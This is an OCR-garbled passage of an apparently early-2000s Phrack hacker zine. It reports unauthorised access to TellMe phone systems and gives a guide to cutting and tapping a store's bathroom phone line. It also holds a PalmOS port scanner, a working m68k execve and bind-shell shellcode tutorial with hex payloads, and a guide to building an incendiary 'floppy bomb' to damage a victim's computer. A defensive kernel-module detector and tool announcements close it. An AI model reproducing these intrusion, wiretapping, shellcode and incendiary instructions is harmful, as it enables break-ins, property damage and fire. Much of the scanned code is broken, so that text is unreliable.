suggest you try it. It is like some whiney hillbilly guy...well see fer 
yerself! 


Extension 11111: 


A gypsy with an eight ball. You ask it questions, and it gives you 
answers. There are no disclaimers, so I guess this is the real deal! Saying 
"quit" or "Stop" won’t help you. Just shut the hell up, and it will kick 
you back into regular Tell-Me. 


Extension 33333: 


Produces the words "HELLO WORLD" 


Extension 34118: 


Produces a directory of TellMe’s offices, with the regular phone 
numbers. 


Most of the worthy extensions consisted of foul language, so anyone 
under 18 should stop reading now... 


Use the letters on your telephone keypad, and you will get some very 
intersting results. These are five letter words corresponding to the 
numbers on your phone. 


CUNTS - Produces a string of numbers of unknown meaning. Just a long 
string of a computer voice saying "one, five, seven, three, twelve, 
eighty-eight" etc. I’1l figure out what that means later. 


TITTY - This produces a fax tone, as opposed to a computer tone. I didn’t 
mess with it. 


PENIS —- This produces a verbal message about the sendmail system. 


HOLES - This is the Quote of the Day. 
BOOBS - This has to do with HTTP protocols. 


SHITO - This is a directory of phone lines in the TellMe system. 


FUCKO - This is a very interesting directory of phone lines in the TellMe 
system. Two of the lines appear to be trusted lines, providing a 
computer tone which I used to log on. There was a first time user 
option, which gave me a manager’s account. (Do they have hundreds 
of managers?) What can it do? I was able to delete my own account 
and bring it back. I didn’t fuck with anyone elses account. My goal 
is not to destroy, but to learn. 
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PISSO - As above, the TellMe system addresses me with a choice of talking 
to a live person, or an automated directory of phone lines. I’m 
amazed this is all behind a five digit password. 


DamnOQ - Yet another directory of trusted phone lines. This one, however 
askes you for another password right up front, so I’m assuming this 
is a more security sensative area! 


Pussy - A discription of how to configure a TellMe webpag 


Cum69 - Advice on proper password generation. (hahahahahahahahahaha!!!!) 


[J 


EATMI 


— Computer tone leading to nowhere. 


The TellMe security protocols are pathetic. 


Archangel (The Teflon Con) 
Wrath of God Hand Delivered 
http://the.feds.are.lookingat.us 


| 
}=-=[ 3 - Shitboxing ] | 
| 


by Agent5 


So you’re sitting in a small family owned type resturaunt or you’re 
walking through a small store looking at their various wares and, as normal 
every couple times a day, you hear the call of nature. You make your way 
towards the (preferably single occupancy) mens room (or ladies for those 
few that may actually read this) and enter. So your doing your thing and 
you’re lookin around checking out your surroundings (why? cause you’re 
supposed to be fucking observant at all times.Thats why.) Your gaze takes 
you towards the ceiling. Looks like most most cheap drop down ceilings. 
hmmmm.... drop down ceiling..... easily removable. So you stand on the 
toilet, or whatever, and take a look. You pull out your pocket flashlight 
and take a look. Nothing but wires. Couple elecrical or telephone mayb 
.. TELEPHONE? Does this mean i can sit on the throne and use the fone? 
Indeed it does! All you need is a few things to help you make your dream 
of phreaking at its absolute lazyest a reality.what you need will (besides 
your beigebox with a RJ-11 plug on the cord) probably cost you, at an 
extreme maximum, 3 bucks for parts and about 6 bucks for an telephone Lin 
Crimper for standard telephone plugs (RJ-11) you will also need a... 
"modular line splitter - Provides two telephone jacks when plugged into the 
end of a telephone line cord. Standard 4-wire jacks. Color: Ivory"----bout 
dollar and change max cost. Most of these parts, if not all, can be found 
at your local radioshack. Now if you havent figured out what i’m getting at 
yet, you should seek medical attention immediately, CAT-scans have helped 
me alot.<twitch> 


Heres what you do and make sure you do it quickly in case they try to 
use the telephone while the line is disconnected. SO make sure you lock the 
door and get to work fast....if you have people beginning to knock on the 
door just make some nasty shitting sounds and say you’ll be out ina 
minute. 


ray 


Cut the line. (no specific tools needed, something sharp will do) 

Attach a plug to either end of the line you have just cut. 

3. Put one end of the plug in one end of the modular line splitter, put the 
one thats left into one of the two holes on the front of the splitter. 

4. Now you can either leave and let the intestinaly distressed old guy 

pouding on the door in, or you can plug your beige box in and have some 

fun. 


i) 


Treat this as you would any other beige boxing session. Keep in mind 
that the people who own the telephone line may want to use it to and may 
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not enjoy having someone on the line already. But for the most part this 


ordinary bathroom has just become a your private tel 
with running water and a toilet for the astronomical 


"This file brought to you by the makers of sharp things." 


Shoutouts to 
Hopping Goblin, 
ninja’s, 


Maddj 


Epiphany, 


port7 alliance, 


Bizurke, 
imbeam, 


lioid, 
and LPH crew 


Master Slate, 
emerica, 


IcOn, 
the rest of the #mabell 


lephone booth, 
sum of 3 dollars US. 


Xenocid 


, 


Bag 


+) 


complete 


| 
|=-=[ 4 - PalmMap v1.6 - Nmap for Palm ] 
| 


(submitted by Shaun Colley <shaunige at yahoo.co.uk>) 


oa oe! BEGIN PALMMAP---— 
PalmMap.bas 
PalmMap vl.6 — Nmap for Palm. 


fn set_auto_off (0) 


s$(0) = "Host:" 

s$(2) = "Start Port:" 

s$(4) = "End Port:" 

fF = form(9, 3, "PalmMap v1.6") 

if f = 0 then end 

if f = 2 then gosub about 

let h$ = s$(1) 

let p = val(s$(3)) 

let e = val(s$(5)) 

let i =p 

let t$ = "PalmMap.log" 

open new "memo", tS as #4 

form2: 

cls 

form btn 30 , 40 , 40 , 18, "connect()", 1 
form btn 85 , 40, 40, 18 , "TCP SYN" , 1 
form btn 60 , 80 , 40, 18 "UDP scan" , 1 
form btn 60 , 120, 40 , 18 "TCP FEIN." ;,. 2 
draw "Scan type?", 50, 20, 1 

while 

x = asc(input$ (1) ) 

if x = 14 then gosub scan 

if x = 15 then print "Scan type not implemented as 
yet WwW 

if x = 16 then print "Scan type not implemented as 
yet Ww 

if x = 17 then print "Scan type not implemented as 
yet." 

wend 

sub scan 

cls 

print at 50, 40 

while(i <= e) 

c = fn tcp(1, hs, i) 

if(c = 0) 

print "Port ", i, "Open" 

fn ctep:(-1,.- * "09 

print #4, "Port ", i, "Open" 

else 

fn tep(-1, ™";. 0) 

print #4, "Port ", i, "Closed" 

endif 

let i=id+tl 

wend 


close #4 


of 


of 


Of 
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print "Scan complete!" 
end 


sub about 

cls 

msgbox("PalmMap - Nmap for Palm.", "About PalmMap 
136%) 

aa END PALMMAP--—-—-—-— 


| 
}=-=[ 5 - Writing Linux/mc68xxx Shellcodez ] 
| 


by madcr (madrats@mail.ru) 


I Introdaction. 

II Registers. 

III Syscalls. 

IV Execve shellcod 

V Bind-socket shellcod 
VI References. 


I. Introdaction. 


The history Motorola begins already with 1920 then they let out radioelements 
and about computers of nothing it was known. Only in 1974, motorola lets out 
the first 8th the bit microprocessor - MC6800, containing 4000 transistors and 
in 1979 motorola announces the first 16th bit processor - MC68000, capable to 
process up to 2 million operations per one second. After 5 more years, in 1984 
motorola relize the first 32th the bit processor (MC68020), containing 200000 
transistors. Till 1994 inclusive motorola improved a series of the processors 
and in a result, in March, release MC68060 processor contained 2,5 million 
transistors. In present days, 68060 is the optimal processor for use any unix. 


The processor can work in 2 modes: User and SuperVisor. It not analogy of the 
real and protected mode in x86 processors. It some kind of protection 

"Just in case". In the user mode it is impossible to cause exceptions and it 
is impossible to have access to all area of memory. In supervisor mode all is 
accessible. Accordingly kernel work in Supervisor mode, and rest in User mode. 


MC68 supported various manufacturers unix, such as netbsd, openbsd, redhat 
linux, debian linux, etc. Given article is focused on linux (in particular 
debian). 


II. Registers. 


The processor as a matter of fact the CISC (but there are some opportunities 
RISC), accordingly not so is a lot of registers: 


Eight registers of the data: with %d0 on %d7. 
Eight registers of the address: with %a0 on %a7. 
The register of the status: %sr. 

wo stack indexes: %sp and %fp 

The program counter: %pc. 


Basically it is not required to us of anything more. And the minimal set of 
instructions which is required to us by development shellcod 


h- 


nstruction example description 


move movl %d0, %dl Put value from %d0 in $%dl 
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lea leal %Ssp@(O0xc),%a0 calculate the address on Oxc to 
displacement in the stack and it 
is put in. %a0. 


eor eorl %d0,%dl1 xor 
pea pea 0x2£2£7368 push in stack ’//sh’ 


In total these 4 instructions will be enough for a spelling functional 

shellcode ?). And now it is high time to tell about the fifth, most important 
instruction (fifth, need us i mean) and about exceptions. The instruction trap 
- a call of exception. In processors motorola, only 256 exceptions, but of all 
of them are necessary for us only one - trap #0. In mc68 linux on this 
exception call to a kernel, for execution system call. Trap 0 refers toa 
vector located to the address $80h (strange concurrence). Now we shall stop on 
system calls more in detail. 


III. System Calls. 


System calls on the given architecture are organized thus: 


$d0 -—- number of a system call. 
$d1,%d2,%d3 - argv 


i.e. to make banal setuid (0); we will have something unpretentious: 


eorl %d2,%d2 
movl %d2,%dl 
movl #23,%d0 
trap #0 


Rather simple. 


IV. cve shellcod 


es 
PA 


So, we shall start as always with old-kind execve: 


-globl _start 


start 
text 
movl #11, %d0 /* execve() (see unistd.h) */ 
movl #m1,%dl /* /bin/sh address a] 
movl #m2,%d2 /* NULL * / 
movl #m2,%d3 /* NULL too ti: 
trap #0 
.data 
ml: .ascii "/bin/sh\0o" 
m2: .ascii "0O\O". 


as execve.s -o execve.o ; ld execve.o -o execv 
./execve 

sh-2.03# exit 

exit 


Such code will not go, since he not pozitsio-independent and did not check him 
on zero. Therefore we shall rewrite him with participation of the stack (since 
the machine at us big endian the order of following of byte needs to be taken 
into account): 


-globl _start 
_start: 
moveq #11, %d0 /* execve() ty 
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pea 0x2£2£7368 /* //sh */ 
pea 0x2£62696e /* /bin (big endian) * / 
movel %sp,%dl /* /bin/sh in $dl ard 
eorl %d2,%d2 /* pea 0x0 + avoiding * / 
movel %d2,%sp@- /* zero byte */ 
pea 0x130 /* pea 0030 -> 0130 = kill the zero ey 
movel %sp,%d2 /* NULL in %d2 ef 
movel %d2,%d3 /* NULL in %d2 9 f 
trap #0 /* syscall */ 
as execve2.s -o execve2.o ; ld execve2.o -o execve2 
./execve2 
sh-2.03# exit 
exit 


Very well. Now we shall mutate him in ascii and we shall look as it works: 


char execve_shellcode[]= 


"\x70\x0b" /* moveq #11, %d0 #7 
"\x48\x79\x2£\x2£\x73\x68" /* pea 0x2f2f7368 -> //sh uae 
"\x48\x79\x2£\x62\x69\x6e" /* pea 0x2f62696e -> /bin * / 
"\x22\x0£" /* movel %sp, %dl * / 
"\xb5\x82" /* eorl %d2,%d2 -> * / 
"\x2£\x02" /* movel %d2,%sp@- -> pea 0x0 */ 
"\x48\x78\x01\x30" /* pea 0x130 Ay 
"\x24\x0£" /* movel %sp, %d2 */ 
"\x26\x02" /* movel %d2,%d3 */ 
"\x4e\x40"; /* trap #0 */ 
main () 


{ 

ink ret; 

ret=(int *)&ret +2; 

*ret = execve_shellcode; 


} 


gcc execve_shellcode.c -o execve_shellcod 
./execve_shellcod 

sh-2.03# exit 

exit 


Our shellcode. Perfectly. But certainly it is not enough of it, therefore we 
shall binding this shellcode on socket. 


V. Bind-socket shellcod 


For the beginning we write our code on C: 
#include <;;shiti;;> 


main () 
{ 
int fd, dupa; 
struct sockaddr_in se4v; 


fd=socket (AF_INET, SOCK_STREAM, 0); 
se4v.sin_port=200; 
se4v.sin_family=2; 
se4v.sin_addr.s_addr=0; 


bind(fd, (struct sockaddr *) &se4v, sizeof (se4v)); 
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listen(fd,1); 
dupa=accept (fd,0,0); 
dup2 (dupa, 0) ; 

dup2 (dupa, 1); 

dup2 (dupa, 2) ; 

execl ("/bin/sh","sh",0); 


gcc -static bindshell.c -o bindshell & 

./bindshell & 
1] 276 

netstat -an | grep 200 
tcp 0 0 0.0.0.0:200 Oe 02s. 0660:3:* LISTEN 
telnet localhost 200 
rryang 127.2001 3% 
Connected to localhost. 
Escape character is ’%]’. 
echo aaaaaaaaaaaa 


aaaaaaaaaaaa 

ctrlitc 

[1]+ Done ./bindshell 

All works. Now the last, that us interests - it as there is a work with a 
network. 


# gdb -q ./bindshell 
(gdb) disas socket 
Dump of assembler code for function socket: 


0x80004734 <socket>: moveal %d2,%a0 
0x80004736 <socket+t2>: moveq #102, %d0 
0x80004738 <socket+t4>: moveq #1, %dl1 

0x8000473a <socket+6>: lea Ssp@(4),%al 


0x8000473e <socket+10>: movel %al,%d2 

0x80004740 <socket+12>: trap #0 

0x80004742 <socket+14>: movel %a0,%d2 

0x80004744 <socket+16>: tstl %d0 

0x80004746 <socket+18>: bmil 0x80004958 <__syscall_error> 
0x8000474c <socket+24>: rts 

0x8000474e <socket+26>: rts 

End of assembler dump. 

(gdb) 


Perfectly. As well as everywher 102 socket_call. 1 - sys_socket. 
(for the full list look net.h). Proceeding from the aforesaid we shall write 
it on the assembler: 


-globl _start 


_start: 
/* socket (AF_INET, SOCK_STREAM, 0) ; * / 
/* af_inet - 2, sock_stream - 1, ip_proto0 - 0 */ 


moveq #2, %d0 
movl %d0,%sp@ /* sock_stream */ 


moveq #1, %d0 

movel %d0,%sp@ (0x4) /* AF_INET */ 

eorl %d0,%d0 

movl %d0,%sp@ (0x8) 

movl %sp,%d2 /* put in d2 the address in the stack on where our argv*/ 


movl #0x66,%d0 /* socketcall (asm/unistd.h) */ 
movl #1, %d1 /* sys_socket (linux/net.h) */ 
trap #0 /* go on vector 80 */ 
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-bind(socket, (struct sockaddr *) &serv, sizeof (serv) ); 


Let’s cal 


mov] 


moveq #2,%d0 
movl 


sd0, ssp@ 


#200, 5d0 
a0, SSp@ (Oxc) 


%d0, $d0 
%d0, %sp@ (0x10) 


6d0, ssp@ (0x14) 


/* in dO back descriptor on socket */ 


/* port number a 


/* sin_addr.s_addr=0 */ 


/* sin_family=2 * / 


lculate the address of an arrangement of constants of the 


second argument and we shall put this address as the second argument 


leal 
movl 


Ssp@(Oxc) ,%a0 
a0, ssp@ (0x4) 


moveq #0x10, %d0 


movt 


mov] 
mov] 


trap 


listen 


(socket,1); 


$d0, ssp@ (0x8) 


0x66, 6d0 
2,601 
0 


* third argument 0x10 */ 

* socketcall (asm/unistd.h) */ 
* sys_bind (linux/net.h) Erk 
* go on vector 80 2), 


* 
*/ 


descriptor socket’s already in stack. 


moveq #1, %d0 
movl %d0,%sp@ (4) 


in d2 already put address of 


the beginning arguments in the stack */ 


movl #0x66, %d0 /* scoketcall (asm/unistd.h) */ 

movl #4, %dal /* sys_listen (linux/net.h) */ 

trap #0 /* go on vector 80 ae 
accept (fd,0,0); 

eorl %d0,%d0 

movl %d0,%sp@ (4) 

movl %d0,%sp@(8) 

movl #0x66, %d0 /* scoketcall (asm/unistd.h) */ 

movl #5, %dal /* sys_accept (linux/net.h) */ 

trap #0 /* go on vector 80 if: 
dup2 (cli,0); 
dup2 (cli,1); 
dup2 (cli,2); 

movl %d0,%dl1 

movl #0x3f,%d0 

movl #0, %d2 

trap #0 

movl %d0, %dl 

movl #0x3f,%d0 

movl #1,%d2 

trap #0 

movl %d0,%dl1 


a 


ay A 
*/ 
ay 


24, 


*/ 
af 
*/ 
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movl #0x3f,%d0 
movl #2,%d2 
trap #0 
/* execve ("/bin/sh") ; xf 
movl #11,%d0 /* execve */ 
pea 0x2f2£7368 /* //sh x/ 
pea 0x2f£62696e /* /bin uf, 
movl %sp,%dl /* /bin/sh in %d1 */ 
eorl %d2,%d2 
movl %d2,%sp@- /* pea 0x0 */ 
pea 0x0130 /* 0030 -> 0130 = kill the zero */ 
movl %sp,%d2 
movl %d2,%d3 
trap #0 
/* ---EOF---bindsock shellcod «iy 
as bindshell.s -o bindshell.o ; ld bindshell.o -o bindshell 
./bindshell & 
309] 
telnet localhost 200 
Trying 127.0.01... 
Connected to localhost. 
Escape character is ’*]’. 
echo aaaaaaaaaaaa 
aaaaaaaaaaaa 
ctrlitc 
In general and all. The code certainly super-not optimized, is some zero, but 


the general picture I hope has given. 


char bind_shellcode[]= 


"\x70\x02" 
"\x2e\x80" 
"\x70\x01" 


"\x2£\x40\x00\x04" 


"\xb1\x80" 


"\x2£\x40\x00\x08" 


"\x24\x0f£" 
"\x70\x66" 
"\x72\x01" 
"\x4e\x40" 
"\x2e\x80" 


"\x30\x3c\x00\xc8" 
"\x2£\x40\x00\x0c" 


"\xb1\x80" 


"\x2£\x4 


0\x00\x10" 


"\x70\x02" 


"\x2£\x4 


0\x00\x14" 


"\x41\xef\x00\x0c" 


"\x2£\x4 


8\x00\x04" 


"\x70\x10" 
"\x2£\x40\ 
"\x70\x66" 
"\x72\x02" 
"\x4e\x40" 
"\x70\x01" 
"\x2£\x40\ 
"\x70\x66" 
"\x72\x04" 
"\x4e\x40" 
"\xb1\x80" 


x00\x08" 


x00\x04" 


/* moveg 
/* movel 
/* moveg 
/* movel 
/* eorl 

/* movel 
/* movel 
/* moveg 
/* moveg 
/* trap 

/* movel 
/* movew 
/* movel 
/* eorl 


/* movel 
/* moveg 
/* movel 
/* lea % 


2,%00 
$d0,Ssp@ 
1,%d0 
$d0,%sp@ (4) 
$d0,%d0 
$d0,ssp@ (8) 
SSp, Sd2 
102, %d0 

1, dal 


#0 
$d0,Ssp@ 
200, %d0 
$d0, Ssp@ (12) 
$d0, Sd0 
$d0, Ssp@ (16) 
#2, 500 
$d0, Ssp@ (20) 
sp@(12),%a0 


/* movel %a0,%sp@ (4) 
/* moveq #16, %d0 

/* movel %d0,%sp@(8) 
/* moveq #102, %d0 

/* moveq #2, %dl 

/* trap #0 

/* moveq #1,%d0 

/* movel %d0,%sp@ (4) 
/* moveq #102, %d0 

/* moveq #4,%dl 

/* trap #0 

/* eorl %d0,%d0 


And at last how it should be: 


3.txt 


"\x2£\x40\x00\x04" /* movel %d0,%sp@ (4) 
"\x2£\x40\x00\x08" /* movel %d0,%sp@(8) 
"\x70\x66" /* moveq #102,%d0 
Wyx7 2 \x05" /* moveq #5, %d1 
"\x4e\x40" /* trap #0 
"\x22\x00" /* movel %d0,%d1 
"\x70\x3£" /* moveq #63, %d0 
"\x74\x00" /* moveq #0, %d2 
"\x4e\x40" /* trap #0 
"\x22\x00" /* movel %d0,%d1 
"\x70\x3£" /* moveq #63, %d0 
"\x74\x01" /* moveq #1, %d2 
"\x4e\x40" /* trap #0 
"\x22\x00" /* movel %d0,%d1 
"\x70\x3£" /* moveq #63,%d0 
"\x74\x02" /* moveq #2, %d2 
"\x4e\x40" /* trap #0 
"\x70\x0b" /* moveq #11,%d0 
"\x48\x79\x2£\x2£\x73\x68" /* pea 2£2£7368 
"\x48\x79\x2£\x62\x69\x6e" /* pea 2£62696e 
"\x22\x0f" /* movel %Ssp,%dl 
"\xb5\x82" /* eorl %d2,%d2 
"\x2£\x02" /* movel %d2,%sp@- 
"\x48\x78\x01\x30" /* pea 130 
"\x24\x0f" /* movel %sp,%d2 
"\x26\x02" /* movel %d2,%d3 
"\x4e\x40"; /* trap #0 
main () 

{ 

int *ret; 

ret=(int *)&ret +2; 

*ret = bind_shellcode; 

} 

p.s. as always - sorry for my poor english. 


VI. References. 


] http://e-www.motorol 


la.com/collateral/M68000PRM. pdf 


als 
[2] http://e-www.motorol 
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la.com/brdata/PDFDB/docs/MC68060UM.pdf - user’s manual 
http://www.lsd-pl.net/documents/asmcodes-1.0.2.pdf 


— programmer’s manual 


- good tutorial 


| 
|=-=[ 6 - Finding hidden kernel modules (the extrem way) ] | 
| 


by madsys <madsys at ercist.iscas.ac.cn> 


Introduction 


The technique of module hiding 


Countermeasur 


Greetings 
References 
Code 


YANO BWNE 


Introduction 


linux system. 


Problem of unmapped 


Generaly speaking, 
their modules after taking down the victim. 


force 


[This paper presents a method for how to find out the hidden modules in 
most of the attackers intend to hide 
They like this way to prevent 
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the change of kernel from being detected by the administrator. As modules 
were linked to a singly linked chain, the original one was unable to be 
recovered while some modules have been removed. In this sense, to retrieve 
the hidden modules came up to be hard. Essential C skill and primary 
knowledge of linux kernel are needed. 


2 The technique of module hiding 


First of all, the most popular and general technique of module hiding 
and the quomodo of application to get module’s list were examined. 
An implement of module hiding was shown as below: 


—---snip----— 
struct module *p; 


for (p=&__this_module; p->next; p=p->next) 
{ 
if (strcmp (p->next-—>name, str) ) 
continue; 


p->next=p->next->next; // <-- here it 
removes that module 
break; 
} 
—---snip---- 


As you can see, in order to hide one module, the unidirectional chain was 
modified, and following is a snippet of sys_create_module() system call, 
which might tell why the technique worked: 


—---snip----— 
spin_lock_irgsave (&modlist_lock, flags); 
mod->next = module_list; 


module_list = mod; /* link it in */ 
spin_unlock_irqrestore(&modlist_lock, flags); 
—---snip----— 


A conclusion could be made: modules linked to the end of unidirectional 
chain when they were created. 


"lsmod" is an application on linux for listing current loaded modules, 
which uses sys_query_module() system call to get the listing of loaded 
modules, and qm_modules() is the actual function called by it while 
querying modules: 


static int gqm_modules(char *buf, size_t bufsize, size_t *ret) 
{ 

struct module *mod; 

size_t nmod, space, len; 


nmod = space = 0; 
for (mod=module_list; mod != &kernel_module; mod=mod->next, 
+t+tnmod) { 
len = strlen(mod->name) +1; 


if (len > bufsize) 
goto calc_space_needed; 

if (copy_to_user (buf, mod->name, len) ) 
return —-EFAULT; 

buf += len; 

bufsize -= len; 

space += len; 


} 


if (put_user(nmod, ret) ) 
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return —-EFAULT; 
else 
return 0; 


calc_space_needed: 
space += len; 
while ((mod mod->next) != &kernel_module) 
spac t= Sstrlen(mod->name) +1; 


if (put_user(space, ret) ) 
return —-EFAULT; 
else 


return —-ENOSPC; 


note: pointer module_list is always at the head of the singly linked 
chain. It clearly showing the technique of hiding module was valid. 


3 Countermeasur brute force 


According to the technique of hiding module, brute force might be useful. 


sys_creat_module() system call was expressed as below. 
—-snip-- 
if ((mod = (struct module *)module_map(size)) == NULL) { 
error = —ENOMEM; 


goto errl; 


} 


=—Snips> 


and the macro module_map in "asm/module.h": 
#define module_map (x) vmalloc (x) 


You should have noticed that the function calls vmalloc() to allocate the 
module struct. So the size limitation of vmalloc zone for brute force is 
able to be exploited to determine what modules in our system on earth. 

As you know, the vmalloc zone is 128M(2.2, 2.4 kernel, there are many 
inanition zones in it), however, any allocated module should be aligned by 
4K. Therefor, the theoretical maximum number we were supposed to detect 
was 128M/4k=32768. 


4 Problem of unmapped 


By far, maybe you think: umm, it’s very easy to use brute force to list 
those evil modules". But it is not true because of an important 

reason: it is possible that the address which you are accessing is 
unmapped, thus it can cause a paging fault and the kernel would report: 
"Unable to handle kernel paging request at virtual address". 


So we must make sure the address we are accessing is mapped. The solution 
is to verify the validity of the corresponding entry in kernel 
pgd(swapper_pg_dir) and the corresponding entry in page table.Furthermore, 
we were supposed to make sure the content of address pointed by "name" 
pointer(in struct module) was valid. Because the 76871024 entries of user 
process’s pgd were synchronous with kerenl pgd, and that was why such 
hardcore address of kernel pgd (0xc0101000) was used. 


following is the function for validating those entries in pgd or pgt: 


int valid_addr (unsigned long address) 
{ 


unsigned long page; 
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if (!address) 
return 0; 


page = ((unsigned long *)0xc0101000) [address >> 22]; 
//pde 
if (page & 1) 
{ 
page &= PAGE_MASK; 
address &= O0x003ff000; 


page = ((unsigned long *) __va(page)) [address >> 
PAGE_SHIFT]; //pte 
if (page) 


return 1; 


} 


return 0; 


} 


After validating those addresses which we would check, the next step would 
be easy -- just brute force. As the list of modules including hidden 
modules had been created, you could compare it with the output of "lsmod". 
Then you can find out those evil modules and get rid of them freely. 


5 Greetings 


ae BEGING MODULE_HUNTER.C----- 


/* 
* module_hunter.c: Search for patterns in the kernel address space that 

* look like module structures. This tools find hidden modules that 

* unlinked themself from the chained list of loaded modules. 

* 

* This tool is currently implemented as a module but can be easily ported 
* to a userland application (using /dev/kmem) . 

* 

* Compile with: gcc -c module_hunter.c —-I/usr/src/linux/include 

* insmod ./module_hunter.o 

* 

* usage: cat /proc/showmodules && dmesg 

*/ 


define MODULE 
define __ KERNEL 


include <linux/config.h> 


ifdef CONFIG_SMP 
define SMP 
endif 


ifdef CONFIG _MODVERSIONS 
define MODVERSIONS 

include <linux/modversions.h> 
#endif 


nclude <linux/module.h> 


J. 


include <linux/kernel.h> 
include <linux/version.h> 
include <linux/unistd.h> 
include <linux/string.h> 
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include <linux/proc_fs.h> 


nclude <linux/errno.h> 
include <asm/uaccess.h> 


= pee 


include <asm/pgtable.h> 
nclude <asm/fixmap.h> 
include <asm/page.h> 


B- 


static int errno; 


int valid_addr (unsigned long address) 


{ 


unsigned long page; 


if (!address) 
return 0; 


page = ((unsigned long *)0xc0101000) [address >> 22]; 


if (page & 1) 
{ 


page &= PAGE _MASK; 
address &= O0x003ff000; 
page = ((unsigned long *) __va(page)) [address >> PAGE_SHIFT]; //pte 
if (page) 
return 1; 


} 


return 0; 


} 


ssize_t 
showmodule_read(struct file *unused_file, char *buffer, size_t len, loff_t *off) 
{ 


struct module *p; 


printk ("address module\n\n"); 

for (p=(struct module *)VMALLOC_START; p<=(struct \ 

module*) (VMALLOC_START+VMALLOC_RESERVE-PAGE_SIZE); p=(struct module \ 
*) ((unsigned long) p+PAGE_SIZE) ) 


if (valid_addr((unsigned long)pt+ (unsigned long)&é((struct \ 

module *)NULL)->name) && valid_addr(* (unsigned long *) ((unsigned long)p+t \ 

(unsigned long) &((struct module *)NULL)->name)) && strlen(p->name) ) 

if (*p->name>=0x21 && *p->name<=O0x7Je && (p->size < 1 <<20)) 
printk("0x%p%20s size: Ox%x\n", p, p->name, p->size); 


} 


return 0; 


} 


static struct file_operations showmodules_ops = { 
read: showmodule_read, 
}; 


int init_module(int x) 
{ 


struct proc_dir_entry *entry; 


ntry = create_proc_entry("showmodules", S_IRUSR, &proc_root); 
entry->proc_fops = &showmodules_ops; 


return 0; 
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} 


void cleanup_module() 


{ 


remove_proc_entry("showmodules", &proc_root); 


MODULE_LICENSE ("GPL") ; 
MODULE_AUTHOR ("madsys<at>ercist.iscas.ac.cn"); 


ees END MODULE-HUNTER.C----- 


| 
|=-=[ 7 - Good old floppy bombs 
| 


[ Note by the editors: We felt like it’s time for a re-print of 
some already forgotton fun with pyro techniques. Enjoy. ] 


How To Make A Diskette Bomb 
by Phrick-A-Phrack 


Before I even start i want to make it clear that i do NOT take any 
responsibility on the use of the information in this document. 


This little baby is good to use to stuff up someones computer a little. 
It can be adapted to a range of other things. 


You will need: 


- A disk (3.5" floppys are a good disk to use) 


— Scissors 
—- White or blue kitchen matches (i have not found any other colors that 
work —- im not sure why) 


— Clear nail polish 
What to do: 


- Carefully open up the diskette 

— remove the cotton covering from the inside. 

—- scrape a lot of match powder into a bowl (use a woodent scraper as metal 
might spark and ignite the match powder) 

- After you have a lot, spread it EVENLY on the disk. 

— Spread nail polish over the match powder on the disk. 

- let it dry. 

- carefully put the diskette back together and use the nail plish to seal 
is shut. 


How to use it: 


Give it to someone you want to give a fright and stuff up their computer 
a little. Tell them its got something they are interested in on it. When 
they put it in their drive the drive head attempts to read the disk which 
causes a small fire - enough heat to melt the disk drive and stuff the 
head up! 


““Phrick-A-Phrack** 
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==Phrack Inc.== 


Volume O0x0b, Issue 0x3d, Phile #0x04 of Ox0f 


[oEs0oO: LZ ARMORY ] 


[ Phrack Staff ] 


This new section, Phrack Toolz Armory, is dedicated to tool 


annoucements 


underground which have been released recently. 


Drop us a mail if you develop something kewl that you think is worth of 


being mentioned in #62. 


Content: 


- Scapy, Interactive Packet Manipulation Program by Biondi 
—- ShellForge, Shellcode Builder by Biondi 
objobf : burneye2 IA32 object file obfuscator by team-teso 


Obs WN EF 
| 


----[ 1 - Scapy : interactive packet manipulation program 


URL : http://www.cartel-securite.fr/pbiondi/scapy.html 

Author : biondi@cartel-securite.fr 

Comment : Scapy is a powerful interactive packet manipulation tool, packet 
generator, network scanner, network discovery tool, and packet 
sniffer. It provides classes to interactively create packets or 
sets of packets, manipulate them, send them over the wire, sniff 
other packets from the wire, match answers and replies, and 
more. Interaction is provided by the Python interpreter, so 


Python programming structures can be used (such as variables, 
loops, and functions). Report modules are possible and easy to 
make. It is able to do about the same things as ttlscan, 

nmap, hping, queso, pOf, xprobe, arping, arp-sk, arpspoof, 
firewalk, irpas, tethereal, tcpdump, etc. 


Here are some techniques that you can use it for : port, 


protocol, network scans, arp cache poisonning, dns poisonning, 
DoSing, nuking, sniffing etherleaking, icmpleaking, firewalking 
NAT discovery, fingerprinting, etc. 


[ 2 ShellForge : shellcode builder 


URL : http://www.cartel-securite.fr/pbiondi/shellforge.html 
Author : biondi@cartel-securite.fr 
Comment : ShellForge is a kit that builds shellcodes from C. 


It 


is inspired from Stealth’s Hellkit. This enables to 


create very complex shellcodes (s xample which scans ports). 
C header files are included that provide macros to substitute 
libe calls with direct system calls and an Python script 


automates compilation, extraction, encoding and tests. 


----[ 3 - objobf : burneye2 IA32 object file obfuscator 


URL : http://www.team-teso.net/projects/objobf/ 

Author : teso@team-teso.net 

Comment : Objobf is part of the burneye2 binary security suite. It is an 
relocatable object file obfuscation program. While still a beta 


re 


lease it works well on smaller object files and can significa 


. We will showcast selected tools of relevance to the computer 


- ELFsh, ELF objects manipulation scripting langage by Devhell labs. 
- Packit, Network injection, capture and auditing by D. Bounds 


, 


nt J 


ELF 


LY 


increase the time for manual decompilation. Within the downloadabl 


Ee 
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- Packit : Network injection, capture and auditing tool 
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tarball there are som xamples. Besides obfuscation it does limited 
code and dataflow analysis and displays them in high quality graphs, 
using the free xvcg or the propietary aiSee graphing tools. 

Full sourcecode of the objobf tool is available at the above URL. 


A 


Fsh 0.51b2 portable : ELF objects manipulation scripting language 


http://elfsh.devhell.org 
http://elfsh.segfault.net (mirror) 
elfsh@devhell.org 

ELFsh is an interactive and scriptable ELF machine to play with 
executable files, shared libraries and relocatable ELF32 
objects. It is useful for daily binary manipulations such as 
on-the-fly patching, embedded code injection, and binary 
analysis in research fields such as revers ngineering, 
security auditing and intrusion detection. ELFsh is based on 
libelfsh, so that the API is really useable in opensource 
projects. This version works on 2 architectures (INTEL, SPARC) 
and 4 OS (Linux, FreeBSD, NetBSD, Solaris). 


http://packit.sf.net 

Darren Bounds <dbounds@intrusense.com> 

Packit (Packet toolkit) is a network auditing tool. Its value is 
derived from its ability to customize, inject, monitor, and 
manipulate IP traffic. By allowing you to define (spoof) nearly 
all TCP, UDP, ICMP, IP, ARP, RARP, and Ethernet header options, 
Packit can be useful in testing firewalls, intrusion 
detection/prevention systems, port scanning, simulating network 
traffic, and general TCP/IP auditing. Packit is also an 
excellent tool for learning TCP/IP. It has been successfully 
compiled and tested to run on FreeBSD, NetBSD, OpenBSD, MacOS X 
and Linux. 
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==Phrack Inc.== 


Issue 0x3d, Phile #0x04 of Ox0f 


